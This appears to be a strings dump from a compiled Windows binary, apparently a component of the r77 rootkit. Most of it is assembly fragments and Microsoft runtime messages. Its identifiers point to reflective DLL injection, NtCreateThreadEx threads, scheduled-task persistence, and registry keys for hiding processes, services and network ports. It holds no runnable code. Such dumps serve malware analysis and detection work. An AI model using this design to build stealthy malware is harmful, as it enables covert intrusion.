HcD$HH
9D$D|QH
H9D$xs
H9D$xv
HcL$HH
HcD$TH
D$49D$0}-
HcD$4Hk
HcD$4Hk
HcL$4H
HcD$4Hk
t7HcD$ H
HcD$ H
H9D$0u
H9D$0u
D$XH9D$Pu
D$XH9D$ t0H
D$XH9D$ u
D$PH9D$ t7H
D$HH9D$@u
D$@H9D$ t+H
H9D$ps
D$$9D$(
D$ HcD$ Hk
HcD$ Hk
HcD$0Hk
D$p9D$@|
JHcD$pL
HcD$ H=
HcD$ Hk
H9D$Ps
D$HH9D$Xr
H9D$Ps
D$HH9D$Xr
H9D$@s
D$0H9D$Xr
H9D$@s
D$0H9D$Xr
H9D$Xs
HcD$@H9
H9D$Xs
HcD$@H9
H9D$Xs
HcD$@H9
H9D$Xs
HcD$@H9
H9D$hs
H9D$0w
HcD$LH
HcD$LH
D$L9D$P}eHcD$PH
H9D$Xs
H9D$xs
D$`H9D$h
D$hH9D$(w/H
D$(H9D$ t`H
D$HH9D$@vPH
D$@H9D$Hs,H
D$HH9D$@wPH
D$XH9D$Hw,H
D$@H9D$8v,H
D$HH9D$8s
D$8H9D$@u
D$8H9D$@sPH
D$@H9D$8v,H
D$8H9D$@rPH
D$PH9D$8v,H
D$8H9D$Ps.HcD$0H
HcD$0H
D$XH9D$Hs
D$XH9D$Hs.HcD$0H
HcD$0H
D$8H9D$Ps
HcD$0H
D$PHcD$0H
|$ }%HcD$ H
H+L$XH;
HcD$TH
tAHcD$TH
9D$P~!
D$`HcD$`H
tAHcD$`H
H9D$8v H
HcD$@H
t>HcD$@H
HcL$0L
HcD$0H9
D$@HcD$0H
D$@HcD$0H
HcD$0H
HcD$0H
H9D$Ps
H9D$hs
H9D$xs
9D$xr:H
D$hH9D$@u
D$89D$lv
D$p9D$<}
HcL$<H
HcL$<H
;D$8w#
H9D$`v8
D$49D$H
D$49D$Xsx
D$H9D$,
D$L9D$4t]
|$$stV
|$$stb
|$$su!H
|$0sv$H
D$(9D$,t
D$hH9D$X
D$hH9D$Xr
D$49D$8u
D$49D$8u
D$@H9D$Hu
HcD$ H
HcD$ H
t'HcD$ H
D$$HcD$ H
HcD$ H
D$HH9D$0
#D$H;D$Hu
D$$9D$ t
HHcD$PH
D$0H9D$Hu
#HcD$0H
u.HcD$0H
YHcD$0H
D$@HcD$0H
HcD$0H
8HcD$0H9
%HcD$0L
HcD$0H
D$hH9D$X
D$hH9D$Xr
HcD$0H
HcD$0H
H9D$Xs
H9D$ps
H9D$0w
HcD$\H
tAHcD$\H
HcD$XH
tAHcD$XH
@9D$(s
D$4HcD$4H
ffffff
fffffff
D$0H9D$ t
HcD$(H
@CH9D$0r5H
H9D$0v
?H9D$0sZH
D$ H9D$Pu
f9D$ u
f9D$ u
D$p9D$@|:H
D$xHcD$xH
D$@9D$X}C
HcL$XHcT$X
D$x9D$\}&HcD$\
D$@9D$l}7
HcD$hL
HcD$@H
D$`HcD$`H;
}OHcD$`
HcD$|H;
HcD$hL
D$dHcD$dH;
}EHcD$d
HcT$dH
D$0H9D$(
D$PH9D$H
D$XH9D$8siH
D$PH9D$Hs]H
D$@9D$Ds!H
D$PH9D$H
D$XH9D$8stH
D$PH9D$HshH
D$@9D$Ds!H
D$pH9D$X
D$xH9D$HsiH
D$pH9D$Xs]H
D$P9D$D
XHcD$`H
XHcD$`H
XHcD$`H
HcD$XH
XHcD$`H
D$49D$8u
D$HH9D$@
H;D$HsaH
D$xH9D$8u
D$HH9D$@
H;D$HsjH
D$xH9D$8u
HcD$8H
D$hH9D$Hr
=HcD$<H
XHcD$`H
HcL$8H
|$Pmu#
HcL$8H
tBHcD$83
@HcD$83
XHcD$`H
D$PH9D$0
D$0Hc@<H
H9D$8r H
H9D$8s
$Hc@<H
:cD$ @
:cD$ @
:cD$ @
tokenSize
tokenSize
domain
domainLength
sidType
tokenPrivileges
bytesRead
bytesWritten
tempPath
fileName
startupInfo
processInformation
taskScheduler
triggerId
trigger
triggerDetails
persistFile
taskScheduler
taskScheduler
is64Bit
breakOnTermination
integrityLevel
thread
exitCode
moduleInfo
oldProtect
valueName
valueNameLength
valueSize
valueName
valueNameLength
valueSize
processCount
moduleCount
moduleBytes
thread
r77ProcessCount
r77ProcessCount
r77ProcessCount
startupKey
pidKey
processNameKey
pathKey
serviceNameKey
tcpLocalKey
tcpRemoteKey
udpKey
securityDescriptor
securityDescriptorSize
subKeyName
subKeyNameLength
is64Bit
bytesWritten
returnValue
bytesRead
authority
everyoneSid
explicitAccess
securityAttributes
processId
bytesRead
returnValue
bytesWritten
currendProcessCount
ReflectiveDllMain
NtQueryObject
ntdll.dll
NtCreateThreadEx
Unknown exception
bad allocation
bad array new length
Stack around the variable '
' was corrupted.
The variable '
' is being used without being initialized.
The value of ESP was not properly saved across a function call. This is usually a result of calling a function declared with one calling convention with a function pointer declared with a different calling convention.
A cast to a smaller data type has caused a loss of data. If this was intentional, you should mask the source of the cast with the appropriate bitmask. For example:
char c = (i & 0xFF);
Changing the code in this way will not affect the quality of the resulting optimized code.
Stack memory was corrupted
A local variable was used before it was initialized
Stack memory around _alloca was corrupted
Unknown Runtime Check Error
Unknown Filename
Unknown Module Name
Run-Time Check Failure #%d - %s
Stack corrupted near unknown variable
Stack area around _alloca memory reserved by this function is corrupted
Data: <
Allocation number within this function:
Size:
Address: 0x
Stack area around _alloca memory reserved by this function is corrupted
%s%s%p%s%zd%s%d%s%s%s%s%s
A variable is being used without being initialized.
Stack pointer corruption
Cast to smaller type causing loss of data
Stack memory corruption
Local variable used before initialization
Stack around _alloca corrupted
RegOpenKeyExW
RegQueryValueExW
RegCloseKey
PDBOpenValidate5
D:\agent\_work\10\s\src\vctools\crt\vcruntime\src\eh\std_type_info.cpp
D:\agent\_work\10\s\src\vctools\crt\vcruntime\src\internal\per_thread_data.cpp
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
template-parameter-
`template-parameter-
generic-type-
`generic-type-
`non-type-template-parameter
`template-type-parameter-
`generic-class-parameter-
`generic-method-parameter-
`template-parameter
`vtordispex{
`vtordisp{
`adjustor{
`local static destructor helper'
`template static data member constructor helper'
`template static data member destructor helper'
static
virtual
private:
protected:
public:
[thunk]:
extern "C"
short
unsigned
volatile
volatile
std::nullptr_t
std::nullptr_t
<ellipsis>
,<ellipsis>
noexcept
double
__int8
__int16
__int32
__int64
__int128
<unknown>
char8_t
char16_t
char32_t
wchar_t
__w64
UNKNOWN
signed
volatile
`unknown ecsu'
union
struct
class
coclass
cointerface
const
cli::array<
cli::pin_ptr<
{flat}
Cannot access value of empty optional
D:\agent\_work\10\s\src\vctools\crt\github\stl\inc\optional
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
bad exception
<program name unknown>
minkernel\crts\ucrt\src\appcrt\misc\dbgrpt.cpp
minkernel\crts\ucrt\src\appcrt\startup\argv_parsing.cpp
minkernel\crts\ucrt\src\desktopcrt\env\environment_initialization.cpp
CorExitProcess
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
minkernel\crts\ucrt\src\appcrt\locale\wsetlocale.cpp
Normal
Ignore
Client